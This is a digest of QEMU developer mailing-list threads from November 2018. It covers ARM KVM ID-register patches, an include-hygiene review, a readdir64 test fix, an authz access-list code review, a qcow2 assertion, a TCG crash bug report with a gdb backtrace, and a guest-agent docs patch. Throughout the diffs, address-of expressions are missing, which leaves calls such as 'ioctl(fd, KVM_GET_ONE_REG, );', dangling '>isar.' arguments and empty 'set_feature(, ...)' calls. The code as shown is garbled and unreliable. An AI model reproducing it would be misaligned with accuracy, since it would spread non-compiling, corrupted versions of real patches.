[Qemu-devel] [PATCH v5 0/4] target/arm: KVM vs ARMISARegisters

[Richard Henderson]

Facepalm.  I managed to not push the v3 changes anywhere,
so the v4 changes were done on top of v2.  Ho hum.

r~


Richard Henderson (4):
  target/arm: Install ARMISARegisters from kvm host
  target/arm: Fill in ARMISARegisters for kvm64
  target/arm: Introduce read_sys_reg32 for kvm32
  target/arm: Fill in ARMISARegisters for kvm32

 target/arm/kvm_arm.h |  1 +
 target/arm/kvm.c |  1 +
 target/arm/kvm32.c   | 77 +++--
 target/arm/kvm64.c   | 90 +++-
 4 files changed, 139 insertions(+), 30 deletions(-)

-- 
2.17.2

[Qemu-devel] [PATCH v5 1/4] target/arm: Install ARMISARegisters from kvm host

[Richard Henderson]

The ID registers are replacing (some of) the feature bits.
We need (some of) these values to determine the set of data
to be handled during migration.

Signed-off-by: Richard Henderson 
---
 target/arm/kvm_arm.h | 1 +
 target/arm/kvm.c | 1 +
 2 files changed, 2 insertions(+)

diff --git a/target/arm/kvm_arm.h b/target/arm/kvm_arm.h
index 21c0129da2..6393455b1d 100644
--- a/target/arm/kvm_arm.h
+++ b/target/arm/kvm_arm.h
@@ -183,6 +183,7 @@ void kvm_arm_destroy_scratch_host_vcpu(int *fdarray);
  * by asking the host kernel)
  */
 typedef struct ARMHostCPUFeatures {
+ARMISARegisters isar;
 uint64_t features;
 uint32_t target;
 const char *dtb_compatible;
diff --git a/target/arm/kvm.c b/target/arm/kvm.c
index 09a86e2820..44dd0ce6ce 100644
--- a/target/arm/kvm.c
+++ b/target/arm/kvm.c
@@ -158,6 +158,7 @@ void kvm_arm_set_cpu_features_from_host(ARMCPU *cpu)
 
 cpu->kvm_target = arm_host_cpu_features.target;
 cpu->dtb_compatible = arm_host_cpu_features.dtb_compatible;
+cpu->isar = arm_host_cpu_features.isar;
 env->features = arm_host_cpu_features.features;
 }
 
-- 
2.17.2

Re: [Qemu-devel] [PATCH 02/13] target: arm: Remove unused headers

[Philippe Mathieu-Daudé]

On 13/11/18 18:01, Peter Maydell wrote:

On 13 November 2018 at 16:52, Samuel Ortiz  wrote:

From: Philippe Mathieu-Daudé 

Signed-off-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
Reviewed-by: Samuel Ortiz 
---
  target/arm/helper.c | 3 ---
  1 file changed, 3 deletions(-)

diff --git a/target/arm/helper.c b/target/arm/helper.c
index 3d4e9c5c8a..27d9285e1e 100644
--- a/target/arm/helper.c
+++ b/target/arm/helper.c
@@ -12,13 +12,10 @@
  #include "internals.h"
  #include "exec/gdbstub.h"
  #include "exec/helper-proto.h"
-#include "qemu/host-utils.h"


This is for muldiv64().


But it is already included by "cpu.h" -> "exec/cpu-defs.h"




  #include "sysemu/arch_init.h"
  #include "sysemu/sysemu.h"
-#include "qemu/bitops.h"


"cpu.h" -> "cpu-qom.h" -> "qom/cpu.h" -> "qemu/bitmap.h"



This is for extract32() and friends.


  #include "qemu/crc32c.h"
  #include "exec/exec-all.h"
-#include "exec/cpu_ldst.h"


This is for cpu_stl_data().


Included by "arm_ldst.h"




  #include "arm_ldst.h"
  #include  /* For crc32 */
  #include "exec/semihost.h"


So they are not "unused" but "unnecessary".

I thought this would be better to clean this once, before Samuel split.

Samuel: please drop this patch from your series.

Thanks,

Phil.

[Qemu-devel] [PATCH v5 2/4] target/arm: Fill in ARMISARegisters for kvm64

[Richard Henderson]

Signed-off-by: Richard Henderson 
---
 target/arm/kvm64.c | 90 --
 1 file changed, 88 insertions(+), 2 deletions(-)

diff --git a/target/arm/kvm64.c b/target/arm/kvm64.c
index 46fbe6d8ff..0a502091e7 100644
--- a/target/arm/kvm64.c
+++ b/target/arm/kvm64.c
@@ -456,17 +456,40 @@ static inline void unset_feature(uint64_t *features, int 
feature)
 *features &= ~(1ULL << feature);
 }
 
+static int read_sys_reg32(int fd, uint32_t *pret, uint64_t id)
+{
+uint64_t ret;
+struct kvm_one_reg idreg = { .id = id, .addr = (uintptr_t) };
+int err;
+
+assert((id & KVM_REG_SIZE_MASK) == KVM_REG_SIZE_U64);
+err = ioctl(fd, KVM_GET_ONE_REG, );
+if (err < 0) {
+return -1;
+}
+*pret = ret;
+return 0;
+}
+
+static int read_sys_reg64(int fd, uint64_t *pret, uint64_t id)
+{
+struct kvm_one_reg idreg = { .id = id, .addr = (uintptr_t)pret };
+
+assert((id & KVM_REG_SIZE_MASK) == KVM_REG_SIZE_U64);
+return ioctl(fd, KVM_GET_ONE_REG, );
+}
+
 bool kvm_arm_get_host_cpu_features(ARMHostCPUFeatures *ahcf)
 {
 /* Identify the feature bits corresponding to the host CPU, and
  * fill out the ARMHostCPUClass fields accordingly. To do this
  * we have to create a scratch VM, create a single CPU inside it,
  * and then query that CPU for the relevant ID registers.
- * For AArch64 we currently don't care about ID registers at
- * all; we just want to know the CPU type.
  */
 int fdarray[3];
 uint64_t features = 0;
+int err;
+
 /* Old kernels may not know about the PREFERRED_TARGET ioctl: however
  * we know these will only support creating one kind of guest CPU,
  * which is its preferred CPU type. Fortunately these old kernels
@@ -487,8 +510,71 @@ bool kvm_arm_get_host_cpu_features(ARMHostCPUFeatures 
*ahcf)
 ahcf->target = init.target;
 ahcf->dtb_compatible = "arm,arm-v8";
 
+err = read_sys_reg64(fdarray[2], >isar.id_aa64pfr0,
+ ARM64_SYS_REG(3, 0, 0, 4, 0));
+if (unlikely(err < 0)) {
+/*
+ * Before v4.15, the kernel only exposed a limited number of system
+ * registers, not including any of the interesting AArch64 ID regs.
+ * For the most part we could leave these fields as zero with minimal
+ * effect, since this does not affect the values seen by the guest.
+ *
+ * However, it could cause problems down the line for QEMU,
+ * so provide a minimal v8.0 default.
+ *
+ * ??? Could read MIDR and use knowledge from cpu64.c.
+ * ??? Could map a page of memory into our temp guest and
+ * run the tiniest of hand-crafted kernels to extract
+ * the values seen by the guest.
+ * ??? Either of these sounds like too much effort just
+ * to work around running a modern host kernel.
+ */
+ahcf->isar.id_aa64pfr0 = 0x0011; /* EL1&0, AArch64 only */
+err = 0;
+} else {
+err |= read_sys_reg64(fdarray[2], >isar.id_aa64pfr1,
+  ARM64_SYS_REG(3, 0, 0, 4, 1));
+err |= read_sys_reg64(fdarray[2], >isar.id_aa64isar0,
+  ARM64_SYS_REG(3, 0, 0, 6, 0));
+err |= read_sys_reg64(fdarray[2], >isar.id_aa64isar1,
+  ARM64_SYS_REG(3, 0, 0, 6, 1));
+
+/*
+ * Note that if AArch32 support is not present in the host,
+ * the AArch32 sysregs are present to be read, but will
+ * return UNKNOWN values.  This is neither better nor worse
+ * than skipping the reads and leaving 0, as we must avoid
+ * considering the values in every case.
+ */
+err |= read_sys_reg32(fdarray[2], >isar.id_isar0,
+  ARM64_SYS_REG(3, 0, 0, 2, 0));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar1,
+  ARM64_SYS_REG(3, 0, 0, 2, 1));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar2,
+  ARM64_SYS_REG(3, 0, 0, 2, 2));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar3,
+  ARM64_SYS_REG(3, 0, 0, 2, 3));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar4,
+  ARM64_SYS_REG(3, 0, 0, 2, 4));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar5,
+  ARM64_SYS_REG(3, 0, 0, 2, 5));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar6,
+  ARM64_SYS_REG(3, 0, 0, 2, 7));
+
+err |= read_sys_reg32(fdarray[2], >isar.mvfr0,
+  ARM64_SYS_REG(3, 0, 0, 3, 0));
+err |= read_sys_reg32(fdarray[2], >isar.mvfr1,
+  ARM64_SYS_REG(3, 0, 0, 3, 1));
+err |= read_sys_reg32(fdarray[2], >isar.mvfr2,
+  ARM64_SYS_REG(3, 0, 0, 3, 2));
+}
+
 

[Qemu-devel] [PATCH v5 3/4] target/arm: Introduce read_sys_reg32 for kvm32

[Richard Henderson]

Assert that the value to be written is the correct size.
No change in functionality here, just mirroring the same
function from kvm64.

Signed-off-by: Richard Henderson 
---
 target/arm/kvm32.c | 41 -
 1 file changed, 16 insertions(+), 25 deletions(-)

diff --git a/target/arm/kvm32.c b/target/arm/kvm32.c
index cb3fb73a96..bc0badf53d 100644
--- a/target/arm/kvm32.c
+++ b/target/arm/kvm32.c
@@ -28,6 +28,14 @@ static inline void set_feature(uint64_t *features, int 
feature)
 *features |= 1ULL << feature;
 }
 
+static int read_sys_reg32(int fd, uint32_t *pret, uint64_t id)
+{
+struct kvm_one_reg idreg = { .id = id, .addr = (uintptr_t)pret };
+
+assert((id & KVM_REG_SIZE_MASK) == KVM_REG_SIZE_U32);
+return ioctl(fd, KVM_GET_ONE_REG, );
+}
+
 bool kvm_arm_get_host_cpu_features(ARMHostCPUFeatures *ahcf)
 {
 /* Identify the feature bits corresponding to the host CPU, and
@@ -35,9 +43,10 @@ bool kvm_arm_get_host_cpu_features(ARMHostCPUFeatures *ahcf)
  * we have to create a scratch VM, create a single CPU inside it,
  * and then query that CPU for the relevant ID registers.
  */
-int i, ret, fdarray[3];
+int err = 0, fdarray[3];
 uint32_t midr, id_pfr0, mvfr1;
 uint64_t features = 0;
+
 /* Old kernels may not know about the PREFERRED_TARGET ioctl: however
  * we know these will only support creating one kind of guest CPU,
  * which is its preferred CPU type.
@@ -47,23 +56,6 @@ bool kvm_arm_get_host_cpu_features(ARMHostCPUFeatures *ahcf)
 QEMU_KVM_ARM_TARGET_NONE
 };
 struct kvm_vcpu_init init;
-struct kvm_one_reg idregs[] = {
-{
-.id = KVM_REG_ARM | KVM_REG_SIZE_U32
-| ENCODE_CP_REG(15, 0, 0, 0, 0, 0, 0),
-.addr = (uintptr_t),
-},
-{
-.id = KVM_REG_ARM | KVM_REG_SIZE_U32
-| ENCODE_CP_REG(15, 0, 0, 0, 1, 0, 0),
-.addr = (uintptr_t)_pfr0,
-},
-{
-.id = KVM_REG_ARM | KVM_REG_SIZE_U32
-| KVM_REG_ARM_VFP | KVM_REG_ARM_VFP_MVFR1,
-.addr = (uintptr_t),
-},
-};
 
 if (!kvm_arm_create_scratch_host_vcpu(cpus_to_try, fdarray, )) {
 return false;
@@ -77,16 +69,15 @@ bool kvm_arm_get_host_cpu_features(ARMHostCPUFeatures *ahcf)
  */
 ahcf->dtb_compatible = "arm,arm-v7";
 
-for (i = 0; i < ARRAY_SIZE(idregs); i++) {
-ret = ioctl(fdarray[2], KVM_GET_ONE_REG, [i]);
-if (ret) {
-break;
-}
-}
+err |= read_sys_reg32(fdarray[2], , ARM_CP15_REG32(0, 0, 0, 0));
+err |= read_sys_reg32(fdarray[2], _pfr0, ARM_CP15_REG32(0, 0, 1, 0));
+err |= read_sys_reg32(fdarray[2], ,
+  KVM_REG_ARM | KVM_REG_SIZE_U32 |
+  KVM_REG_ARM_VFP | KVM_REG_ARM_VFP_MVFR1);
 
 kvm_arm_destroy_scratch_host_vcpu(fdarray);
 
-if (ret) {
+if (err < 0) {
 return false;
 }
 
-- 
2.17.2

[Qemu-devel] [PATCH v5 4/4] target/arm: Fill in ARMISARegisters for kvm32

[Richard Henderson]

Signed-off-by: Richard Henderson 
---
 target/arm/kvm32.c | 40 +++-
 1 file changed, 35 insertions(+), 5 deletions(-)

diff --git a/target/arm/kvm32.c b/target/arm/kvm32.c
index bc0badf53d..bd51eb43c8 100644
--- a/target/arm/kvm32.c
+++ b/target/arm/kvm32.c
@@ -44,7 +44,7 @@ bool kvm_arm_get_host_cpu_features(ARMHostCPUFeatures *ahcf)
  * and then query that CPU for the relevant ID registers.
  */
 int err = 0, fdarray[3];
-uint32_t midr, id_pfr0, mvfr1;
+uint32_t midr, id_pfr0;
 uint64_t features = 0;
 
 /* Old kernels may not know about the PREFERRED_TARGET ioctl: however
@@ -71,9 +71,39 @@ bool kvm_arm_get_host_cpu_features(ARMHostCPUFeatures *ahcf)
 
 err |= read_sys_reg32(fdarray[2], , ARM_CP15_REG32(0, 0, 0, 0));
 err |= read_sys_reg32(fdarray[2], _pfr0, ARM_CP15_REG32(0, 0, 1, 0));
-err |= read_sys_reg32(fdarray[2], ,
+
+err |= read_sys_reg32(fdarray[2], >isar.id_isar0,
+  ARM_CP15_REG32(0, 0, 2, 0));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar1,
+  ARM_CP15_REG32(0, 0, 2, 1));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar2,
+  ARM_CP15_REG32(0, 0, 2, 2));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar3,
+  ARM_CP15_REG32(0, 0, 2, 3));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar4,
+  ARM_CP15_REG32(0, 0, 2, 4));
+err |= read_sys_reg32(fdarray[2], >isar.id_isar5,
+  ARM_CP15_REG32(0, 0, 2, 5));
+if (read_sys_reg32(fdarray[2], >isar.id_isar6,
+   ARM_CP15_REG32(0, 0, 2, 7))) {
+/*
+ * Older kernels don't support reading ID_ISAR6. This register was
+ * only introduced in ARMv8, so we can assume that it is zero on a
+ * CPU that a kernel this old is running on.
+ */
+ahcf->isar.id_isar6 = 0;
+}
+
+err |= read_sys_reg32(fdarray[2], >isar.mvfr0,
+  KVM_REG_ARM | KVM_REG_SIZE_U32 |
+  KVM_REG_ARM_VFP | KVM_REG_ARM_VFP_MVFR0);
+err |= read_sys_reg32(fdarray[2], >isar.mvfr1,
   KVM_REG_ARM | KVM_REG_SIZE_U32 |
   KVM_REG_ARM_VFP | KVM_REG_ARM_VFP_MVFR1);
+/*
+ * FIXME: There is not yet a way to read MVFR2.
+ * Fortunately there is not yet anything in there that affects migration.
+ */
 
 kvm_arm_destroy_scratch_host_vcpu(fdarray);
 
@@ -95,13 +125,13 @@ bool kvm_arm_get_host_cpu_features(ARMHostCPUFeatures 
*ahcf)
 if (extract32(id_pfr0, 12, 4) == 1) {
 set_feature(, ARM_FEATURE_THUMB2EE);
 }
-if (extract32(mvfr1, 20, 4) == 1) {
+if (extract32(ahcf->isar.mvfr1, 20, 4) == 1) {
 set_feature(, ARM_FEATURE_VFP_FP16);
 }
-if (extract32(mvfr1, 12, 4) == 1) {
+if (extract32(ahcf->isar.mvfr1, 12, 4) == 1) {
 set_feature(, ARM_FEATURE_NEON);
 }
-if (extract32(mvfr1, 28, 4) == 1) {
+if (extract32(ahcf->isar.mvfr1, 28, 4) == 1) {
 /* FMAC support implies VFPv4 */
 set_feature(, ARM_FEATURE_VFP4);
 }
-- 
2.17.2

Re: [Qemu-devel] [PATCH 02/13] target: arm: Remove unused headers

[Peter Maydell]

On 13 November 2018 at 18:02, Philippe Mathieu-Daudé  wrote:
> On 13/11/18 18:01, Peter Maydell wrote:
>>
>> On 13 November 2018 at 16:52, Samuel Ortiz  wrote:

>>> --- a/target/arm/helper.c
>>> +++ b/target/arm/helper.c
>>> @@ -12,13 +12,10 @@
>>>   #include "internals.h"
>>>   #include "exec/gdbstub.h"
>>>   #include "exec/helper-proto.h"
>>> -#include "qemu/host-utils.h"
>>
>>
>> This is for muldiv64().
>
>
> But it is already included by "cpu.h" -> "exec/cpu-defs.h"

> So they are not "unused" but "unnecessary".
>
> I thought this would be better to clean this once, before Samuel split.

Generally I think that if a .c file directly uses function X declared in
header Y it should #include Y, even if it happens that it already includes
other header Z that includes Y. Otherwise if we refactor Z later such
that it no longer needs to include Y, it will break compilation of the .c
file. (That is, Z including Y is a detail of the implementation of Z,
not a guarantee made by Z to its users.)

The exception here is where the header guarantees that it's going
to include certain other things (which is the case for eg our osdep.h).

thanks
-- PMM

Re: [Qemu-devel] [PATCH 02/13] target: arm: Remove unused headers

[Philippe Mathieu-Daudé]

On Tue, Nov 13, 2018 at 7:08 PM Peter Maydell  wrote:
> On 13 November 2018 at 18:02, Philippe Mathieu-Daudé  
> wrote:
> > On 13/11/18 18:01, Peter Maydell wrote:
> >> On 13 November 2018 at 16:52, Samuel Ortiz  wrote:
>
> >>> --- a/target/arm/helper.c
> >>> +++ b/target/arm/helper.c
> >>> @@ -12,13 +12,10 @@
> >>>   #include "internals.h"
> >>>   #include "exec/gdbstub.h"
> >>>   #include "exec/helper-proto.h"
> >>> -#include "qemu/host-utils.h"
> >>
> >>
> >> This is for muldiv64().
> >
> >
> > But it is already included by "cpu.h" -> "exec/cpu-defs.h"
>
> > So they are not "unused" but "unnecessary".
> >
> > I thought this would be better to clean this once, before Samuel split.
>
> Generally I think that if a .c file directly uses function X declared in
> header Y it should #include Y, even if it happens that it already includes
> other header Z that includes Y. Otherwise if we refactor Z later such
> that it no longer needs to include Y, it will break compilation of the .c
> file. (That is, Z including Y is a detail of the implementation of Z,
> not a guarantee made by Z to its users.)

Yes, this makes sense now, thanks.

Phil.

> The exception here is where the header guarantees that it's going
> to include certain other things (which is the case for eg our osdep.h).
>
> thanks
> -- PMM

[Qemu-devel] [PATCH] tests/tcg/multiarch: fix 32bit linux-test on 64bit host

[Laurent Vivier]

Fix:

  TESTlinux-test on i386
  .../tests/tcg/multiarch/linux-test.c:201: readdir

readdir() calls getdents64() to have the list of the entries in a
directory, and getdents64() can return 64bit d_off values (with ext4,
for instance) that will not fit in the 32bit d_off field of the
readdir() dirent structure.

To avoid that, use readdir64() to use a 64bit d_off field too.

Signed-off-by: Laurent Vivier 
---
 tests/tcg/multiarch/linux-test.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/tests/tcg/multiarch/linux-test.c b/tests/tcg/multiarch/linux-test.c
index e80eccc0ce..fa4243fc04 100644
--- a/tests/tcg/multiarch/linux-test.c
+++ b/tests/tcg/multiarch/linux-test.c
@@ -83,7 +83,7 @@ static void test_file(void)
 struct utimbuf tbuf;
 struct iovec vecs[2];
 DIR *dir;
-struct dirent *de;
+struct dirent64 *de;
 /* TODO: make common tempdir creation for tcg tests */
 char template[] = "/tmp/linux-test-XX";
 char *tmpdir = mkdtemp(template);
@@ -186,7 +186,7 @@ static void test_file(void)
 error("opendir");
 len = 0;
 for(;;) {
-de = readdir(dir);
+de = readdir64(dir);
 if (!de)
 break;
 if (strcmp(de->d_name, ".") != 0 &&
-- 
2.17.2

Re: [Qemu-devel] [PATCH v6 08/11] authz: add QAuthZList object type for an access control list

[Daniel P . Berrangé]

On Thu, Nov 08, 2018 at 02:23:43AM +0400, Marc-André Lureau wrote:
> Hi
> 
> On Fri, Oct 19, 2018 at 5:45 PM Daniel P. Berrangé  wrote
> > ---
> >  Makefile|   7 +-
> >  Makefile.objs   |   4 +
> >  qapi/authz.json |  58 
> >  qapi/qapi-schema.json   |   1 +
> >  include/authz/list.h| 106 ++
> >  authz/list.c| 309 
> >  tests/test-authz-list.c | 171 ++
> >  .gitignore  |   4 +
> >  MAINTAINERS |   1 +
> >  authz/Makefile.objs |   1 +
> >  authz/trace-events  |   4 +
> >  tests/Makefile.include  |   4 +
> >  12 files changed, 669 insertions(+), 1 deletion(-)
> >  create mode 100644 qapi/authz.json
> >  create mode 100644 include/authz/list.h
> >  create mode 100644 authz/list.c
> >  create mode 100644 tests/test-authz-list.c
> >

> > diff --git a/qapi/authz.json b/qapi/authz.json
> > new file mode 100644
> > index 00..607839c627
> > --- /dev/null
> > +++ b/qapi/authz.json
> > @@ -0,0 +1,58 @@
> > +# -*- Mode: Python -*-
> > +#
> > +# QAPI authz definitions
> > +
> > +##
> > +# @QAuthZListPolicy:
> > +#
> > +# The authorization policy result
> > +#
> > +# @deny: deny access
> > +# @allow: allow access
> > +#
> > +# Since: 3.0
> 
> obviously, you'll have to update to 3.2

4.0 in fact since we bump at the start of each year


> > +##
> > +# @QAuthZListRuleListHack:
> > +#
> > +# Not exposed via QMP; hack to generate QAuthZListRuleList
> > +# for use internally by the code.
> 
> Well, this will probably end in the documentation (it's already in the
> .json, which is one source of documentation ;).
> 
> What about adding a 'gen-list' field, or a 'pragma' listing the
> structs that should have list code generated?

I'll leave that for future motivated contributors, as I'm just
following pre-existing best practice here.


> > +static bool qauthz_list_is_allowed(QAuthZ *authz,
> > +   const char *identity,
> > +   Error **errp)
> > +{
> > +QAuthZList *lauthz = QAUTHZ_LIST(authz);
> > +QAuthZListRuleList *rules = lauthz->rules;
> > +
> > +while (rules) {
> > +QAuthZListRule *rule = rules->value;
> > +QAuthZListFormat format = rule->has_format ? rule->format :
> > +QAUTHZ_LIST_FORMAT_EXACT;
> > +
> > +trace_qauthz_list_check_rule(authz, rule->match, identity,
> > + format, rule->policy);
> > +switch (format) {
> > +case QAUTHZ_LIST_FORMAT_EXACT:
> > +if (strcmp(rule->match, identity) == 0) {
> 
> g_str_equal() ?

Yes.

> 
> > +return rule->policy == QAUTHZ_LIST_POLICY_ALLOW;
> > +}
> > +break;
> > +#ifdef CONFIG_FNMATCH
> > +case QAUTHZ_LIST_FORMAT_GLOB:
> > +if (fnmatch(rule->match, identity, 0) == 0) {
> 
> Would GPatternSpec be a good alternative?

Excellent, I didn't know about it

> > +return rule->policy == QAUTHZ_LIST_POLICY_ALLOW;
> > +}
> > +break;
> > +#else
> > +return false;
> > +#endif
> > +default:
> 
> 
> No g_warn_if_reached() ?Then perhaps add a comment why.

I guess we could.

> > +ssize_t qauthz_list_delete_rule(QAuthZList *auth, const char *match)
> > +{
> > +QAuthZListRule *rule;
> > +QAuthZListRuleList *rules, *prev;
> > +size_t i = 0;
> > +
> > +prev = NULL;
> > +rules = auth->rules;
> > +while (rules) {
> > +rule = rules->value;
> > +if (g_str_equal(rule->match, match)) {
> > +if (prev) {
> > +prev->next = rules->next;
> > +} else {
> > +auth->rules = rules->next;
> > +}
> > +rules->next = NULL;
> > +qapi_free_QAuthZListRuleList(rules);
> > +return i;
> 
> What's the point in returning the old index? Maybe true/false along
> with an Error would be more convenient?

It is required for the conversion of the existing acl_remove API
in the HMP monitor.


Regards,
Daniel
-- 
|: https://berrange.com  -o-https://www.flickr.com/photos/dberrange :|
|: https://libvirt.org -o-https://fstop138.berrange.com :|
|: https://entangle-photo.org-o-https://www.instagram.com/dberrange :|

Re: [Qemu-devel] [for 3.1? PATCH] qcow2: Assert that refcount block offsets fit in the refcount table

[Eric Blake]

On 11/13/18 10:45 AM, Alberto Garcia wrote:

Refcount table entries have a field to store the offset of the
refcount block. The rest of the bits of the entry are currently
reserved.

The offset is always taken from the entry using REFT_OFFSET_MASK to
ensure that we only use the bits that belong to that field.

While that mask is used every time we read from the refcount table, it
is never used when we write to it. Due to the other constraints of the
qcow2 format QEMU can never produce refcount block offsets that don't
fit in that field so any such offset when allocating a refcount block
would indicate a bug in QEMU.
---
  block/qcow2-refcount.c | 3 +++
  1 file changed, 3 insertions(+)



Reviewed-by: Eric Blake 

--
Eric Blake, Principal Software Engineer
Red Hat, Inc.   +1-919-301-3266
Virtualization:  qemu.org | libvirt.org

[Qemu-devel] [Bug 1803160] [NEW] qemu-3.1.0-rc0: tcg.c crash in temp_load

[Alberto Ortega]

Public bug reported:

QEMU version:
-

qemu-3.1.0-rc0 compiled from sources (earlier versions also affected)

Summary:


TCG crashes in i386 and x86_64 when it tries to execute some specific
illegal instructions. When running full OS emulation, both the guest
system and QEMU crash.

The issue has been reproduced in two scenarios:

Ubuntu x64 host running Debian x86 guest with the following command
line: qemu-system-x86_64 -m 4G debian.qcow

When the attached ELF file is executed inside the guest, QEMU crashes.

It can also be reproduced from the command line:

$ qemu-i386 tcg_crash.elf
/home/alberto/Documents/qemu-3.1.0-rc0/tcg/tcg.c:2863: tcg fatal error
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
zsh: segmentation fault (core dumped)  
../qemu-3.1.0-rc0/build/i386-linux-user/qemu-i386 tcg_crash.elf

GDB backtrace:

(gdb) bt
#0  0x60206488 in raise ()
#1  0x60206b8a in abort ()
#2  0x60007016 in temp_load (s=s@entry=0x607a2780 , 
ts=ts@entry=0x607a3178 , desired_regs=, 
allocated_regs=allocated_regs@entry=16400)
at /home/alberto/Documents/qemu-3.1.0-rc0/tcg/tcg.c:2863
#3  0x6000a4d9 in tcg_reg_alloc_op (op=0x62808c20, s=) 
at /home/alberto/Documents/qemu-3.1.0-rc0/tcg/tcg.c:3070
#4  tcg_gen_code (s=, tb=tb@entry=0x607ac040 
) at 
/home/alberto/Documents/qemu-3.1.0-rc0/tcg/tcg.c:3598
#5  0x6003ef9a in tb_gen_code (cpu=cpu@entry=0x627e0010, 
pc=pc@entry=134512724, cs_base=cs_base@entry=0, flags=flags@entry=4194483, 
cflags=cflags@entry=0)
at /home/alberto/Documents/qemu-3.1.0-rc0/accel/tcg/translate-all.c:1752
#6  0x6003d979 in tb_find (cf_mask=0, tb_exit=0, last_tb=0x0, cpu=0x0) 
at /home/alberto/Documents/qemu-3.1.0-rc0/accel/tcg/cpu-exec.c:404
#7  cpu_exec (cpu=cpu@entry=0x627e0010) at 
/home/alberto/Documents/qemu-3.1.0-rc0/accel/tcg/cpu-exec.c:724
#8  0x6006e1a0 in cpu_loop (env=env@entry=0x627e82c0) at 
/home/alberto/Documents/qemu-3.1.0-rc0/linux-user/i386/cpu_loop.c:93
#9  0x600037c5 in main (argc=2, argv=0x7fffdd28, envp=) at /home/alberto/Documents/qemu-3.1.0-rc0/linux-user/main.c:819
(gdb)

Testcase:
-

Find ELF file attached.

** Affects: qemu
 Importance: Undecided
 Status: New

** Attachment added: "tcg_crash.elf"
   
https://bugs.launchpad.net/bugs/1803160/+attachment/5212335/+files/tcg_crash.elf

** Description changed:

  QEMU version:
  -
  
  qemu-3.1.0-rc0 compiled from sources (earlier versions also affected)
  
  Summary:
  
  
  TCG crashes in i386 and x86_64 when it tries to execute some specific
  illegal instructions. When running full OS emulation, both the guest
  system and QEMU crash.
  
  The issue has been reproduced in two scenarios:
  
  Ubuntu x64 host running Debian x86 guest with the following command
  line: qemu-system-x86_64 -m 4G debian.qcow
  
  When the attached ELF file is executed inside the guest, QEMU crashes.
  
  It can also be reproduced from the command line:
  
  $ qemu-i386 tcg_crash.elf
  /home/alberto/Documents/qemu-3.1.0-rc0/tcg/tcg.c:2863: tcg fatal error
  qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  zsh: segmentation fault (core dumped)  
../qemu-3.1.0-rc0/build/i386-linux-user/qemu-i386 tcg_crash.elf
  
  GDB backtrace:
  
  (gdb) bt
  #0  0x60206488 in raise ()
  #1  0x60206b8a in abort ()
  #2  0x60007016 in temp_load (s=s@entry=0x607a2780 , 
ts=ts@entry=0x607a3178 , desired_regs=, 
allocated_regs=allocated_regs@entry=16400)
- at /home/alberto/Documents/qemu-3.1.0-rc0/tcg/tcg.c:2863
+ at /home/alberto/Documents/qemu-3.1.0-rc0/tcg/tcg.c:2863
  #3  0x6000a4d9 in tcg_reg_alloc_op (op=0x62808c20, s=) 
at /home/alberto/Documents/qemu-3.1.0-rc0/tcg/tcg.c:3070
  #4  tcg_gen_code (s=, tb=tb@entry=0x607ac040 
) at 
/home/alberto/Documents/qemu-3.1.0-rc0/tcg/tcg.c:3598
  #5  0x6003ef9a in tb_gen_code (cpu=cpu@entry=0x627e0010, 
pc=pc@entry=134512724, cs_base=cs_base@entry=0, flags=flags@entry=4194483, 
cflags=cflags@entry=0)
- at /home/alberto/Documents/qemu-3.1.0-rc0/accel/tcg/translate-all.c:1752
+ at /home/alberto/Documents/qemu-3.1.0-rc0/accel/tcg/translate-all.c:1752
  #6  0x6003d979 in tb_find (cf_mask=0, tb_exit=0, last_tb=0x0, 
cpu=0x0) at /home/alberto/Documents/qemu-3.1.0-rc0/accel/tcg/cpu-exec.c:404
  #7  cpu_exec (cpu=cpu@entry=0x627e0010) at 
/home/alberto/Documents/qemu-3.1.0-rc0/accel/tcg/cpu-exec.c:724
  #8  0x6006e1a0 in cpu_loop (env=env@entry=0x627e82c0) at 
/home/alberto/Documents/qemu-3.1.0-rc0/linux-user/i386/cpu_loop.c:93
  #9  0x600037c5 in main (argc=2, argv=0x7fffdd28, envp=) at /home/alberto/Documents/qemu-3.1.0-rc0/linux-user/main.c:819
  (gdb)
  
  Testcase:
  -
  
- Find ELF file attached, and also in the following hexdump:
- 
- $ hexdump -C tcg_crash.elf
-   7f 45 4c 46 01 01 01 00  00 00 00 00 00 00 00 00  |.ELF|
- 0010  02 00 03 

Re: [Qemu-devel] [PATCH 1/1] qga: update docs with systemd suspend support info

[Daniel Henrique Barboza]

On 11/13/18 2:39 PM, Daniel Henrique Barboza wrote:



On 11/13/18 2:32 PM, Eric Blake wrote:

On 11/13/18 10:09 AM, Daniel Henrique Barboza wrote:

Commit 067927d62e ("qga: systemd hibernate/suspend/hybrid-sleep
support") failed to update qapi-schema.json after adding systemd
hibernate/suspend/hybrid-sleep capabilities to guest-suspend-* QGA
commands.

Signed-off-by: Daniel Henrique Barboza 
---
  qga/qapi-schema.json | 37 ++---
  1 file changed, 26 insertions(+), 11 deletions(-)



+++ b/qga/qapi-schema.json
@@ -532,12 +532,16 @@
  #
  # Suspend guest to disk.
  #
-# This command tries to execute the scripts provided by the 
pm-utils package.
-# If it's not available, the suspend operation will be performed by 
manually

-# writing to a sysfs file.
+# This command attempts to suspend the guest using three 
strategies, in this

+# order:
  #
-# For the best results it's strongly recommended to have the pm-utils
-# package installed in the guest.
+# - systemd hibernate
+# - pm-utils (via pm-hibernate)
+# - manual write into sysfs
+#
+# If the guest does not have systemd hibernate support, the scripts 
in pm-utils
+# package are executed, in case pm-utils is available. Manual write 
in sysfs

+# is a last resort.


Does this paragraph add any information compared to the earlier list?


Perhaps we can remove the paragraph and add "if available" remarks in 
the listing?

Like:

+# - systemd hibernate, if supported
+# - pm-utils (via pm-hibernate), if pm-utils is installed
+# - manual write into sysfs as a last resort

Same for the other 2 cases below.


Actually, nevermind. Removing the extra paragraph and keeping the list as is
seems cleaner. One can easily assume that, in the lack of guest support of
